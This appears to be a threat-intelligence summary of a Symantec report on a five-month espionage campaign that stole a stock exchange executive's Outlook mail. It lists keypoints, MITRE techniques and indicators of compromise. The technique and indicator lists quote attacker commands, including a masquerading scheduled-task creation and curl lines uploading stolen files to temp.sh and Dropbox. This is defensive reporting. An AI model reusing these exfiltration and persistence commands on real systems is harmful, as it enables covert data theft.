Threat Research

Espionage Campaign Targeted Stock Exchange Executive for Five Months

Symantec
Espionage Campaign Targeted Stock Exchange Executive for Five Months
A five-month espionage campaign targeted a senior executive’s Outlook mailbox at a major global stock exchange, using Dropbox, OneDrive Personal, and temporary hosting services to quietly exfiltrate mailbox data in small batches. The attackers relied on masquerading binaries, scheduled tasks, and an Aspose-based OST stealer to maintain persistence and avoid detection while stealing near-continuous email content. #Dropbox #OneDrive #Aspose #Outlook #MicrosoftOneDriveSyncServiceCore

Keypoints

  • The campaign focused on a single high-value target: the email account of a senior figure at a major global stock exchange.
  • The attackers maintained access for about five months, enabling long-term collection of emails, calendar data, contacts, and other sensitive business information.
  • Dropbox was used for exfiltration and command-and-control, with a persistent Dropbox application and reused OAuth credentials over the campaign.
  • OneDrive Personal was later added as a second exfiltration path, including connections to hard-coded Microsoft IP addresses to reduce DNS-based visibility.
  • An Aspose-based OST stealer was repeatedly used to convert and extract Outlook mailbox content in incremental date ranges.
  • The intruders relied on masquerading binaries, service-like scheduled tasks, and Windows temp directories to blend into normal system activity.
  • A brief use of temp.sh and several staged DLL/executable components suggested continued experimentation with stealth and persistence, though attribution to a known group was not possible.

MITRE Techniques

  • [T1053.005] Scheduled Task/Job: Scheduled Task – Used repeatedly to maintain persistence and run malicious components on a timer (‘schtasks /create /sc minute /mo 5 /rl highest /ru “system” /tn “MicrosoftWindowsAdobeARM Service” …’).
  • [T1036] Masquerading – Multiple binaries and task names were disguised as legitimate Adobe, OneDrive, Lenovo, and Microsoft components (‘mimic the legitimate Adobe Acrobat Reader Update service’, ‘masquerading as a Lenovo system-health check’).
  • [T1105] Ingress Tool Transfer – Tools and payloads were placed and reused on the host to support the intrusion (‘dropped into a series of Windows temp subfolders’, ‘reused across every Dropbox upload and download’).
  • [T1114.001] Email Collection: Local Email Collection – The attackers stole the contents of a local Outlook OST mailbox file for later exfiltration (‘Aspose-based OST stealer’, ‘target user’s Outlook OST as the input’).
  • [T1041] Exfiltration Over C2 Channel – Data was uploaded through Dropbox API traffic that doubled as command-and-control (‘used curl to upload data to the Dropbox content endpoint’).
  • [T1567.002] Exfiltration to Cloud Storage – Sensitive mailbox data was exfiltrated to Dropbox and OneDrive Personal (‘They used legitimate cloud services (Dropbox and OneDrive) for exfiltration’).
  • [T1021] Remote Services – Cloud Service – The attackers leveraged cloud services as interactive infrastructure for persistence and transfer (‘Dropbox API token’, ‘OneDrive Personal’).
  • [T1071.001] Application Layer Protocol: Web Protocols – HTTPS requests were used for upload and exfiltration activity (‘curl https://api.dropbox.com/oauth2/token’, ‘curl “https://onedrive.live.com/…’).
  • [T1090.002] Proxy: External Proxy – Cloud endpoints and public services were used to route activity through external infrastructure and obscure origin (‘use legitimate cloud services … for exfiltration and their command and control infrastructure’).

Indicators of Compromise

  • [SHA256 hashes] Malicious executables and DLLs used in the campaign – db59813e3f27fb8608a4876e758f60b69d9700dc22d15237ac095bb3166fb622, 6c700ca4e6d917c7aa9d964e98604a0349d9b8b4673df96a3f73a3d2d042635a, and 2 more hashes.
  • [File names] Masquerading binaries and staging files found on the victim host – ts_9ea0.tmp, onedrivesync.exe, and other named binaries such as armsvc.exe and oneservice.exe.
  • [File paths] Locations used for persistence and staging – CSIDL_COMMON_APPDATAadobearmarmsvc.exe, CSIDL_COMMON_APPDATAmicrosoft onedrivesetuponedrivesync.exe, and CSIDL_COMMON_APPDATAintel.
  • [Scheduled task names] Persistence artifacts created by the attackers – MicrosoftWindowsAdobeARM Service, MicrosoftWindowsLenovoCheckServerHealth, and MicrosoftWindowsMicrosoftOneDriveSyncServiceCore.
  • [IP addresses] Microsoft and temporary-hosting endpoints used for exfiltration – 13.107.137.11, 150.171.41.11, and 51.91.79.17.
  • [Domains / services] Cloud and file-transfer services used by the attackers – api.dropbox.com, content.dropboxapi.com, onedrive.live.com, and temp.sh.
  • [Command-line artifacts] Malicious execution patterns observed on the host – curl -X POST https://content.dropboxapi.com/2/files/upload and curl -F file=@c:windowstempTS_C7E3.tmp https://temp.sh/upload -k.

Read more: https://www.security.com/threat-intelligence/stock-exchange-espionage

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint